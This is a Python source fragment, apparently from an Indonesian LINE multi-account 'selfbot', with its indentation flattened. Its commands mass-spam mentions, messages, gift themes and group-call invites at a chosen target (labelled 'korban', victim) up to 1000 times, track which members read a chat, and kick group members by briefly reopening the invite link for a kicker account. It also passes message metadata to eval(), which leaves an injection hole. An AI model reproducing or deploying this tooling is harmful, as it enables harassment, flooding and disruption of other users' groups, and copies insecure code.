elif cmd == "listadmin":
if wait["selfbot"] == True:
if msg._from in admin:
ma = ""
mb = ""
mc = ""
a = 0
b = 0
c = 0
for m_id in owner:
a = a + 1
end = '\n'
ma += str(a) + ". " +cl.getContact(m_id).displayName + "\n"
for m_id in admin:
b = b + 1
end = '\n'
mb += str(b) + ". " +cl.getContact(m_id).displayName + "\n"
for m_id in staff:
c = c + 1
end = '\n'
mc += str(c) + ". " +cl.getContact(m_id).displayName + "\n"
cl.sendMessage(msg.to,"Ghovin admin\n\nSuper admin:\n"+ma+"\nAdmin:\n"+mb+"\nStaff:\n"+mc+"\nTotal「%s」 Ghovin" %(str(len(owner)+len(admin)+len(staff))))
elif cmd == "listprotect":
if wait["selfbot"] == True:
if msg._from in admin:
ma = ""
mb = ""
mc = ""
md = ""
a = 0
b = 0
c = 0
d = 0
gid = protectqr
for group in gid:
a = a + 1
end = '\n'
ma += str(a) + ". " +cl.getGroup(group).name + "\n"
gid = protectkick
for group in gid:
b = b + 1
end = '\n'
mb += str(b) + ". " +cl.getGroup(group).name + "\n"
gid = protectjoin
for group in gid:
d = d + 1
end = '\n'
md += str(d) + ". " +cl.getGroup(group).name + "\n"
gid = protectcancel
for group in gid:
c = c + 1
end = '\n'
mc += str(c) + ". " +cl.getGroup(group).name + "\n"
cl.sendMessage(msg.to,"♪GHOVINBOT♪ Protection\n\n❧PROTECT URL :\n"+ma+"\n❧PROTECT KICK :\n"+mb+"\n❧PROTECT JOIN :\n"+md+"\n❧PROTECT CANCEL:\n"+mc+"\nTotal「%s」Grup yg dijaga" %(str(len(protectqr)+len(protectkick)+len(protectjoin)+len(protectcancel))))
elif cmd == "respon":
if wait["selfbot"] == True:
if msg._from in admin:
ki.sendMessage(msg.to,responsename1)
kk.sendMessage(msg.to,responsename2)
kc.sendMessage(msg.to,responsename3)
elif cmd == "invitebot":
if wait["selfbot"] == True:
if msg._from in admin:
try:
anggota = [Bmid,Cmid,Amid]
cl.inviteIntoGroup(msg.to, anggota)
kk.acceptGroupInvitation(msg.to)
kc.acceptGroupInvitation(msg.to)
ki.acceptGroupInvitation(msg.to)
except:
pass
elif cmd == "antijs stay":
if wait["selfbot"] == True:
if msg._from in admin:
try:
ginfo = cl.getGroup(msg.to)
cl.inviteIntoGroup(msg.to, [Zmid])
cl.sendMessage(msg.to,"Grup 「"+str(ginfo.name)+"」 Aman Dari JS")
except:
pass
elif cmd == "/all":
if wait["selfbot"] == True:
if msg._from in admin:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventedJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
kk.acceptGroupInvitationByTicket(msg.to,Ticket)
kc.acceptGroupInvitationByTicket(msg.to,Ticket)
G = kc.getGroup(msg.to)
G.preventedJoinByTicket = True
kc.updateGroup(G)
elif cmd == ".all":
if wait["selfbot"] == True:
if msg._from in admin:
G = cl.getGroup(msg.to)
ki.sendText(msg.to, "Bye bye fams "+str(G.name))
ki.leaveGroup(msg.to)
kk.leaveGroup(msg.to)
kc.leaveGroup(msg.to)
elif cmd == "byeme":
if wait["selfbot"] == True:
if msg._from in admin:
G = cl.getGroup(msg.to)
cl.sendText(msg.to, "Bye bye fams "+str(G.name))
cl.leaveGroup(msg.to)
elif cmd.startswith("leave "):
if msg._from in admin:
proses = text.split(" ")
ng = text.replace(proses[0] + " ","")
gid = cl.getGroupIdsJoined()
for i in gid:
h = cl.getGroup(i).name
if h == ng:
ki.sendMessage(i, "Silahkan admin invite atau masukan kembali")
ki.leaveGroup(i)
kk.leaveGroup(i)
kc.leaveGroup(i)
cl.sendMessage(to,"Berhasil keluar dari grup " +h)
elif cmd == "assist1":
if msg._from in admin:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventedJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
G = ki.getGroup(msg.to)
G.preventedJoinByTicket = True
ki.updateGroup(G)
elif cmd == "assist2":
if msg._from in admin:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventedJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
kk.acceptGroupInvitationByTicket(msg.to,Ticket)
G = kk.getGroup(msg.to)
G.preventedJoinByTicket = True
kk.updateGroup(G)
elif cmd == "assist3":
if msg._from in admin:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventedJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
kc.acceptGroupInvitationByTicket(msg.to,Ticket)
G = kc.getGroup(msg.to)
G.preventedJoinByTicket = True
kc.updateGroup(G)
elif cmd == "kicker join":
if msg._from in admin:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventedJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
sw.acceptGroupInvitationByTicket(msg.to,Ticket)
G = sw.getGroup(msg.to)
G.preventedJoinByTicket = True
sw.updateGroup(G)
elif cmd == "kicker bye":
if msg._from in admin:
G = cl.getGroup(msg.to)
sw.leaveGroup(msg.to)
elif cmd == "sprespon":
if wait["selfbot"] == True:
if msg._from in admin:
get_profile_time_start = time.time()
get_profile = cl.getProfile()
get_profile_time = time.time() - get_profile_time_start
get_group_time_start = time.time()
get_group = cl.getGroupIdsJoined()
get_group_time = time.time() - get_group_time_start
get_contact_time_start = time.time()
get_contact = cl.getContact(mid)
get_contact_time = time.time() - get_contact_time_start
cl.sendMessage(msg.to, "★Ghovin Speed respon\n\n - Get Profile\n %.10f\n - Get Contact\n %.10f\n - Get Group\n %.10f" % (get_profile_time/3,get_contact_time/3,get_group_time/3))
elif cmd == "speed" or cmd == "sp":
if wait["selfbot"] == True:
if msg._from in admin:
start = time.time()
cl.sendMessage(msg.to, "Progres speed...")
elapsed_time = time.time() - start
cl.sendMessage(msg.to, "{} detik".format(str(elapsed_time)))
elif cmd == "lurking on":
if wait["selfbot"] == True:
if msg._from in admin:
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
Setmain['ARreadPoint'][msg.to] = msg_id
Setmain['ARreadMember'][msg.to] = {}
cl.sendText(msg.to, "Lurking berhasil diaktifkan\n\nTanggal : "+ datetime.strftime(timeNow,'%Y-%m-%d')+"\nJam [ "+ datetime.strftime(timeNow,'%H:%M:%S')+" ]")
elif cmd == "lurking off":
if wait["selfbot"] == True:
if msg._from in admin:
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
del Setmain['ARreadPoint'][msg.to]
del Setmain['ARreadMember'][msg.to]
cl.sendText(msg.to, "Lurking berhasil dinoaktifkan\n\nTanggal : "+ datetime.strftime(timeNow,'%Y-%m-%d')+"\nJam [ "+ datetime.strftime(timeNow,'%H:%M:%S')+" ]")
elif cmd == "lurkers":
if msg._from in admin:
if msg.to in Setmain['ARreadPoint']:
if Setmain['ARreadMember'][msg.to] != {}:
aa = []
for x in Setmain['ARreadMember'][msg.to]:
aa.append(x)
try:
arrData = ""
textx = " [ Result {} member ] \n\n [ Lurkers ]\n1. ".format(str(len(aa)))
arr = []
no = 1
b = 1
for i in aa:
b = b + 1
end = "\n"
mention = "@x\n"
slen = str(len(textx))
elen = str(len(textx) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':i}
arr.append(arrData)
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
textx += mention
if no < len(aa):
no += 1
textx += str(b) + ". "
else:
try:
no = "[ {} ]".format(str(cl.getGroup(msg.to).name))
except:
no = " "
msg.to = msg.to
msg.text = textx+"\nTanggal : "+ datetime.strftime(timeNow,'%Y-%m-%d')+"\nJam [ "+ datetime.strftime(timeNow,'%H:%M:%S')+" ]"
msg.contentMetadata = {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}
msg.contentType = 0
cl.sendMessage1(msg)
except:
pass
try:
del Setmain['ARreadPoint'][msg.to]
del Setmain['ARreadMember'][msg.to]
except:
pass
Setmain['ARreadPoint'][msg.to] = msg.id
Setmain['ARreadMember'][msg.to] = {}
else:
cl.sendText(msg.to, "User kosong...")
else:
cl.sendText(msg.to, "Ketik lurking on dulu")
elif cmd == "sider on":
if wait["selfbot"] == True:
if msg._from in admin:
try:
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
cl.sendMessage(msg.to, "Cek sider diaktifkan\n\nTanggal : "+ datetime.strftime(timeNow,'%Y-%m-%d')+"\nJam [ "+ datetime.strftime(timeNow,'%H:%M:%S')+" ]")
del cctv['point'][msg.to]
del cctv['sidermem'][msg.to]
del cctv['cyduk'][msg.to]
except:
pass
cctv['point'][msg.to] = msg.id
cctv['sidermem'][msg.to] = ""
cctv['cyduk'][msg.to]=True
elif cmd == "sider off":
if wait["selfbot"] == True:
if msg._from in admin:
if msg.to in cctv['point']:
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
cctv['cyduk'][msg.to]=False
cl.sendMessage(msg.to, "Cek sider dinonaktifkan\n\nTanggal : "+ datetime.strftime(timeNow,'%Y-%m-%d')+"\nJam [ "+ datetime.strftime(timeNow,'%H:%M:%S')+" ]")
else:
cl.sendMessage(msg.to, "Sudak tidak aktif")
#===========Hiburan============#
elif cmd.startswith("sholat: "):
if msg._from in admin:
sep = text.split(" ")
location = text.replace(sep[0] + " ","")
with requests.session() as web:
web.headers["user-agent"] = random.choice(settings["userAgent"])
r = web.get("http://api.corrykalam.net/apisholat.php?lokasi={}".format(urllib.parse.quote(location)))
data = r.text
data = json.loads(data)
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
if data[1] != "Subuh : " and data[2] != "Dzuhur : " and data[3] != "Ashar : " and data[4] != "Maghrib : " and data[5] != "Isha : ":
ret_ = "「Jadwal Sholat」"
ret_ += "\n❧Lokasi : " + data[0]
ret_ += "\n❧" + data[1]
ret_ += "\n❧" + data[2]
ret_ += "\n❧" + data[3]
ret_ += "\n❧" + data[4]
ret_ += "\n❧" + data[5]
ret_ += "\n\nTanggal : " + datetime.strftime(timeNow,'%Y-%m-%d')
ret_ += "\nJam : " + datetime.strftime(timeNow,'%H:%M:%S')
cl.sendMessage(msg.to, str(ret_))
elif cmd.startswith("cuaca: "):
if msg._from in admin:
separate = text.split(" ")
location = text.replace(separate[0] + " ","")
with requests.session() as web:
web.headers["user-agent"] = random.choice(settings["userAgent"])
r = web.get("http://api.corrykalam.net/apicuaca.php?kota={}".format(urllib.parse.quote(location)))
data = r.text
data = json.loads(data)
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
if "result" not in data:
ret_ = "「Status Cuaca」"
ret_ += "\n❧Lokasi : " + data[0].replace("Temperatur di kota ","")
ret_ += "\n❧Suhu : " + data[1].replace("Suhu : ","") + " C"
ret_ += "\n❧Kelembaban : " + data[2].replace("Kelembaban : ","") + " %"
ret_ += "\n❧Tekanan udara : " + data[3].replace("Tekanan udara : ","") + " HPa"
ret_ += "\n❧Kecepatan angin : " + data[4].replace("Kecepatan angin : ","") + " m/s"
ret_ += "\n\nTanggal : " + datetime.strftime(timeNow,'%Y-%m-%d')
ret_ += "\nJam : " + datetime.strftime(timeNow,'%H:%M:%S')
cl.sendMessage(msg.to, str(ret_))
elif cmd.startswith("lokasi: "):
if msg._from in admin:
separate = msg.text.split(" ")
location = msg.text.replace(separate[0] + " ","")
with requests.session() as web:
web.headers["user-agent"] = random.choice(settings["userAgent"])
r = web.get("http://api.corrykalam.net/apiloc.php?lokasi={}".format(urllib.parse.quote(location)))
data = r.text
data = json.loads(data)
if data[0] != "" and data[1] != "" and data[2] != "":
link = "https://www.google.co.id/maps/@{},{},15z".format(str(data[1]), str(data[2]))
ret_ = "「Info Lokasi」"
ret_ += "\n❧Location : " + data[0]
ret_ += "\n❧Google Maps : " + link
else:
ret_ = "[Details Location] Error : Location not found"
cl.sendMessage(msg.to,str(ret_))
elif cmd.startswith("lirik: "):
if msg._from in admin:
sep = msg.text.split(" ")
search = msg.text.replace(sep[0] + " ","")
params = {'songname': search}
with requests.session() as web:
web.headers["User-Agent"] = random.choice(settings["userAgent"])
r = web.get("https://ide.fdlrcn.com/workspace/yumi-apis/joox?{}".format(urllib.parse.urlencode(params)))
try:
data = json.loads(r.text)
for song in data:
songs = song[5]
lyric = songs.replace('ti:','Title - ')
lyric = lyric.replace('ar:','Artist - ')
lyric = lyric.replace('al:','Album - ')
removeString = "[1234567890.:]"
for char in removeString:
lyric = lyric.replace(char,'')
ret_ = "╔══[ Lyric ]"
ret_ += "\n╠ Nama lagu : {}".format(str(song[0]))
ret_ += "\n╠ Durasi : {}".format(str(song[1]))
ret_ += "\n╠ Link : {}".format(str(song[3]))
ret_ += "\n╚══[ Finish ]\n\nLirik nya :\n{}".format(str(lyric))
cl.sendText(msg.to, str(ret_))
except:
cl.sendText(to, "Lirik tidak ditemukan")
elif cmd.startswith("music: "):
if msg._from in admin:
sep = msg.text.split(" ")
search = msg.text.replace(sep[0] + " ","")
params = {'songname': search}
with requests.session() as web:
web.headers["User-Agent"] = random.choice(settings["userAgent"])
r = web.get("https://ide.fdlrcn.com/workspace/yumi-apis/joox?{}".format(urllib.parse.urlencode(params)))
try:
data = json.loads(r.text)
for song in data:
ret_ = "╔══[ Music ]"
ret_ += "\n╠ Nama lagu : {}".format(str(song[0]))
ret_ += "\n╠ Durasi : {}".format(str(song[1]))
ret_ += "\n╠ Link : {}".format(str(song[3]))
ret_ += "\n╚══[ Waiting Audio ]"
cl.sendText(msg.to, str(ret_))
cl.sendText(msg.to, "Mohon bersabar musicnya lagi di upload")
cl.sendAudioWithURL(msg.to, song[3])
except:
cl.sendText(to, "Musik tidak ditemukan")
elif cmd.startswith("gimage: "):
if msg._from in admin:
sep = msg.text.split(" ")
search = msg.text.replace(sep[0] + " ","")
url = "https://api.xeonwz.ga/api/image/google?q={}".format(urllib.parse.quote(search))
with requests.session() as web:
web.headers["User-Agent"] = random.choice(settings["userAgent"])
r = web.get(url)
data = r.text
data = json.loads(data)
if data["data"] != []:
start = timeit.timeit()
items = data["data"]
path = random.choice(items)
a = items.index(path)
b = len(items)
cl.sendText(msg.to,"「Google Image」\nType : Search Image\nTime taken : %seconds" % (start))
cl.sendImageWithURL(msg.to, str(path))
elif cmd.startswith("ytmp4: "):
if msg._from in admin:
try:
sep = msg.text.split(" ")
textToSearch = msg.text.replace(sep[0] + " ","")
query = urllib.parse.quote(textToSearch)
search_url="https://www.youtube.com/results?search_query="
mozhdr = {'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3'}
sb_url = search_url + query
sb_get = requests.get(sb_url, headers = mozhdr)
soupeddata = BeautifulSoup(sb_get.content, "html.parser")
yt_links = soupeddata.find_all("a", class_ = "yt-uix-tile-link")
x = (yt_links[1])
yt_href = x.get("href")
yt_href = yt_href.replace("watch?v=", "")
qx = "https://youtu.be" + str(yt_href)
vid = pafy.new(qx)
stream = vid.streams
best = vid.getbest()
best.resolution, best.extension
for s in stream:
me = best.url
hasil = ""
title = "Judul [ " + vid.title + " ]"
author = '\n\n❧Author : ' + str(vid.author)
durasi = '\n❧Duration : ' + str(vid.duration)
suka = '\n❧Likes : ' + str(vid.likes)
rating = '\n❧Rating : ' + str(vid.rating)
deskripsi = '\n❧Deskripsi : ' + str(vid.description)
cl.sendVideoWithURL(msg.to, me)
cl.sendText(msg.to,title+ author+ durasi+ suka+ rating+ deskripsi)
except Exception as e:
cl.sendText(msg.to,str(e))
elif cmd.startswith("ytmp3: "):
if msg._from in admin:
try:
sep = msg.text.split(" ")
textToSearch = msg.text.replace(sep[0] + " ","")
query = urllib.parse.quote(textToSearch)
search_url="https://www.youtube.com/results?search_query="
mozhdr = {'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3'}
sb_url = search_url + query
sb_get = requests.get(sb_url, headers = mozhdr)
soupeddata = BeautifulSoup(sb_get.content, "html.parser")
yt_links = soupeddata.find_all("a", class_ = "yt-uix-tile-link")
x = (yt_links[1])
yt_href = x.get("href")
yt_href = yt_href.replace("watch?v=", "")
qx = "https://youtu.be" + str(yt_href)
vid = pafy.new(qx)
stream = vid.streams
bestaudio = vid.getbestaudio()
bestaudio.bitrate
best = vid.getbest()
best.resolution, best.extension
for s in stream:
shi = bestaudio.url
me = best.url
vin = s.url
hasil = ""
title = "Judul [ " + vid.title + " ]"
author = '\n\n❧Author : ' + str(vid.author)
durasi = '\n❧Duration : ' + str(vid.duration)
suka = '\n❧Likes : ' + str(vid.likes)
rating = '\n❧Rating : ' + str(vid.rating)
deskripsi = '\n❧Deskripsi : ' + str(vid.description)
cl.sendImageWithURL(msg.to, me)
cl.sendAudioWithURL(msg.to, shi)
cl.sendText(msg.to,title+ author+ durasi+ suka+ rating+ deskripsi)
except Exception as e:
cl.sendText(msg.to,str(e))
elif cmd.startswith("profileig: "):
if msg._from in admin:
try:
sep = msg.text.split(" ")
instagram = msg.text.replace(sep[0] + " ","")
response = requests.get("https://www.instagram.com/"+instagram+"?__a=1")
data = response.json()
namaIG = str(data['user']['full_name'])
bioIG = str(data['user']['biography'])
mediaIG = str(data['user']['media']['count'])
verifIG = str(data['user']['is_verified'])
usernameIG = str(data['user']['username'])
followerIG = str(data['user']['followed_by']['count'])
profileIG = data['user']['profile_pic_url_hd']
privateIG = str(data['user']['is_private'])
followIG = str(data['user']['follows']['count'])
link = "❧Link : " + "https://www.instagram.com/" + instagram
text = "❧Name : "+namaIG+"\n❧Username : "+usernameIG+"\n❧Biography : "+bioIG+"\n❧Follower : "+followerIG+"\n❧Following : "+followIG+"\n❧Post : "+mediaIG+"\n❧Verified : "+verifIG+"\n❧Private : "+privateIG+"" "\n" + link
cl.sendImageWithURL(msg.to, profileIG)
cl.sendMessage(msg.to, str(text))
except Exception as e:
cl.sendMessage(msg.to, str(e))
elif cmd.startswith("cekdate: "):
if msg._from in admin:
sep = msg.text.split(" ")
tanggal = msg.text.replace(sep[0] + " ","")
r=requests.get('https://script.google.com/macros/exec?service=AKfycbw7gKzP-WYV2F5mc9RaR7yE3Ve1yN91Tjs91hp_jHSE02dSv9w&nama=ervan&tanggal='+tanggal)
data=r.text
data=json.loads(data)
lahir = data["data"]["lahir"]
usia = data["data"]["usia"]
ultah = data["data"]["ultah"]
zodiak = data["data"]["zodiak"]
cl.sendMessage(msg.to,"❧I N F O R M A S I ❧\n\n"+"❧Date Of Birth : "+lahir+"\n❧Age : "+usia+"\n❧Ultah : "+ultah+"\n❧Zodiak : "+zodiak)
elif cmd.startswith("jumlah: "):
if wait["selfbot"] == True:
if msg._from in admin:
proses = text.split(":")
strnum = text.replace(proses[0] + ":","")
num = int(strnum)
Setmain["ARlimit"] = num
cl.sendText(msg.to,"Total Spamtag Diubah Menjadi " +strnum)
elif cmd.startswith("spamcall: "):
if wait["selfbot"] == True:
if msg._from in admin:
proses = text.split(":")
strnum = text.replace(proses[0] + ":","")
num = int(strnum)
wait["limit"] = num
cl.sendText(msg.to,"Total Spamcall Diubah Menjadi " +strnum)
elif cmd.startswith("spamtag "):
if wait["selfbot"] == True:
if msg._from in admin:
if 'MENTION' in msg.contentMetadata:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
zx = ""
zxc = " "
zx2 = []
pesan2 = "@a"" "
xlen = str(len(zxc))
xlen2 = str(len(zxc)+len(pesan2)-1)
zx = {'S':xlen, 'E':xlen2, 'M':key1}
zx2.append(zx)
zxc += pesan2
msg.contentType = 0
msg.text = zxc
lol = {'MENTION':str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')}
msg.contentMetadata = lol
jmlh = int(Setmain["ARlimit"])
if jmlh <= 1000:
for x in range(jmlh):
try:
cl.sendMessage1(msg)
except Exception as e:
cl.sendText(msg.to,str(e))
else:
cl.sendText(msg.to,"Jumlah melebihi 1000")
elif cmd == "spamcall":
if wait["selfbot"] == True:
if msg._from in admin:
if msg.toType == 2:
group = cl.getGroup(to)
members = [mem.mid for mem in group.members]
jmlh = int(wait["limit"])
cl.sendMessage(msg.to, "Berhasil mengundang {} undangan Call Grup".format(str(wait["limit"])))
if jmlh <= 1000:
for x in range(jmlh):
try:
call.acquireGroupCallRoute(to)
call.inviteIntoGroupCall(to, contactIds=members)
except Exception as e:
cl.sendText(msg.to,str(e))
else:
cl.sendText(msg.to,"Jumlah melebihi batas")
elif 'Gift: ' in msg.text:
if wait["selfbot"] == True:
if msg._from in admin:
korban = msg.text.replace('Gift: ','')
korban2 = korban.split()
midd = korban2[0]
jumlah = int(korban2[1])
if jumlah <= 1000:
for var in range(0,jumlah):
cl.sendMessage(midd, None, contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '6'}, contentType=9)
ki.sendMessage(midd, None, contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '6'}, contentType=9)
kk.sendMessage(midd, None, contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '6'}, contentType=9)
kc.sendMessage(midd, None, contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '6'}, contentType=9)
elif 'Spam: ' in msg.text:
if wait["selfbot"] == True:
if msg._from in admin:
korban = msg.text.replace('Spam: ','')
korban2 = korban.split()
midd = korban2[0]
jumlah = int(korban2[1])
if jumlah <= 1000:
for var in range(0,jumlah):
cl.sendMessage(midd, str(Setmain["ARmessage1"]))
ki.sendMessage(midd, str(Setmain["ARmessage1"]))
kk.sendMessage(midd, str(Setmain["ARmessage1"]))
kc.sendMessage(midd, str(Setmain["ARmessage1"]))
elif 'ID line: ' in msg.text:
if wait["selfbot"] == True:
if msg._from in admin:
msgs = msg.text.replace('ID line: ','')
conn = cl.findContactsByUserid(msgs)
if True:
cl.sendMessage(msg.to, "http://line.me/ti/p/~" + msgs)
cl.sendMessage(msg.to, None, contentMetadata={'mid': conn.mid}, contentType=13)
#===========Protection============#
elif 'Welcome ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Welcome ','')
if spl == 'on':
if msg.to in welcome:
msgs = "Welcome Msg sudah aktif"
else:
welcome.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Welcome Msg diaktifkan\nDi Group : " +str(ginfo.name)
cl.sendMessage(msg.to, "「Diaktifkan」\n" + msgs)
elif spl == 'off':
if msg.to in welcome:
welcome.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Welcome Msg dinonaktifkan\nDi Group : " +str(ginfo.name)
else:
msgs = "Welcome Msg sudah tidak aktif"
cl.sendMessage(msg.to, "「Dinonaktifkan」\n" + msgs)
elif 'Protecturl ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Protecturl ','')
if spl == 'on':
if msg.to in protectqr:
msgs = "Protect url sudah aktif"
else:
protectqr.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Protect url diaktifkan\nDi Group : " +str(ginfo.name)
cl.sendMessage(msg.to, "「Diaktifkan」\n" + msgs)
elif spl == 'off':
if msg.to in protectqr:
protectqr.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Protect url dinonaktifkan\nDi Group : " +str(ginfo.name)
else:
msgs = "Protect url sudah tidak aktif"
cl.sendMessage(msg.to, "「Dinonaktifkan」\n" + msgs)
elif 'Protectkick ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Protectkick ','')
if spl == 'on':
if msg.to in protectkick:
msgs = "Protect kick sudah aktif"
else:
protectkick.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Protect kick diaktifkan\nDi Group : " +str(ginfo.name)
cl.sendMessage(msg.to, "「Diaktifkan」\n" + msgs)
elif spl == 'off':
if msg.to in protectkick:
protectkick.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Protect kick dinonaktifkan\nDi Group : " +str(ginfo.name)
else:
msgs = "Protect kick sudah tidak aktif"
cl.sendMessage(msg.to, "「Dinonaktifkan」\n" + msgs)
elif 'Protectjoin ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Protectjoin ','')
if spl == 'on':
if msg.to in protectjoin:
msgs = "Protect join sudah aktif"
else:
protectjoin.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Protect join diaktifkan\nDi Group : " +str(ginfo.name)
cl.sendMessage(msg.to, "「Diaktifkan」\n" + msgs)
elif spl == 'off':
if msg.to in protectjoin:
protectjoin.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Protect join dinonaktifkan\nDi Group : " +str(ginfo.name)
else:
msgs = "Protect join sudah tidak aktif"
cl.sendMessage(msg.to, "「Dinonaktifkan」\n" + msgs)
elif 'Protectcancel ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Protectcancel ','')
if spl == 'on':
if msg.to in protectcancel:
msgs = "Protect cancel sudah aktif"
else:
protectcancel.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Protect cancel diaktifkan\nDi Group : " +str(ginfo.name)
cl.sendMessage(msg.to, "「Diaktifkan」\n" + msgs)
elif spl == 'off':
if msg.to in protectcancel:
protectcancel.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Protect cancel dinonaktifkan\nDi Group : " +str(ginfo.name)
else:
msgs = "Protect cancel sudah tidak aktif"
cl.sendMessage(msg.to, "「Dinonaktifkan」\n" + msgs)
elif 'Antijs ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Antijs ','')
if spl == 'on':
if msg.to in protectantijs:
msgs = "Anti JS sudah aktif"
else:
protectantijs.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Anti JS Diaktifkan\nDi Group : " +str(ginfo.name)
cl.sendMessage(msg.to, "「Diaktifkan」\n" + msgs)
elif spl == 'off':
if msg.to in protectantijs:
protectantijs.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Anti JS Dinonaktifkan\nDi Group : " +str(ginfo.name)
else:
msgs = "Anti JS Sudah Tidak Aktif"
cl.sendMessage(msg.to, "「Dinonaktifkan」\n" + msgs)
elif 'Ghost ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Ghost ','')
if spl == 'on':
if msg.to in ghost:
msgs = "Ghost sudah aktif"
else:
ghost.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Ghost Diaktifkan\nDi Group : " +str(ginfo.name)
cl.sendMessage(msg.to, "「Diaktifkan」\n" + msgs)
elif spl == 'off':
if msg.to in ghost:
ghost.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Ghost Dinonaktifkan\nDi Group : " +str(ginfo.name)
else:
msgs = "Ghost Sudah Tidak Aktif"
cl.sendMessage(msg.to, "「Dinonaktifkan」\n" + msgs)
elif 'Gho pro ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Gho pro ','')
if spl == 'on':
if msg.to in protectqr:
msgs = ""
else:
protectqr.append(msg.to)
if msg.to in protectkick:
msgs = ""
else:
protectkick.append(msg.to)
if msg.to in protectjoin:
msgs = ""
else:
protectjoin.append(msg.to)
if msg.to in protectcancel:
ginfo = cl.getGroup(msg.to)
msgs = "Semua protect sudah on\nDi Group : " +str(ginfo.name)
else:
protectcancel.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Berhasil mengaktifkan semua protect\nDi Group : " +str(ginfo.name)
cl.sendMessage(msg.to, "「Diaktifkan」\n" + msgs)
elif spl == 'off':
if msg.to in protectqr:
protectqr.remove(msg.to)
else:
msgs = ""
if msg.to in protectkick:
protectkick.remove(msg.to)
else:
msgs = ""
if msg.to in protectjoin:
protectjoin.remove(msg.to)
else:
msgs = ""
if msg.to in protectcancel:
protectcancel.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Berhasil menonaktifkan semua protect\nDi Group : " +str(ginfo.name)
else:
ginfo = cl.getGroup(msg.to)
msgs = "Semua protect sudah off\nDi Group : " +str(ginfo.name)
cl.sendMessage(msg.to, "「Dinonaktifkan」\n" + msgs)
#===========KICKOUT============#
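# "Nk @user": the main account briefly opens the group invite link, the kicker
# account (sw) joins via the reissued ticket, kicks the mentioned target, leaves,
# and the link is closed again so the group QR stays protected.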
elif ("Nk " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target not in Bots:
try:
G = cl.getGroup(msg.to)
G.preventedJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
sw.acceptGroupInvitationByTicket(msg.to,Ticket)
sw.kickoutFromGroup(msg.to, [target])
sw.leaveGroup(msg.to)
X = cl.getGroup(msg.to)
X.preventedJoinByTicket = True
cl.updateGroup(X)
except:
pass
elif ("Kick1 " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target not in Bots:
try:
random.choice(ABC).kickoutFromGroup(msg.to, [target])
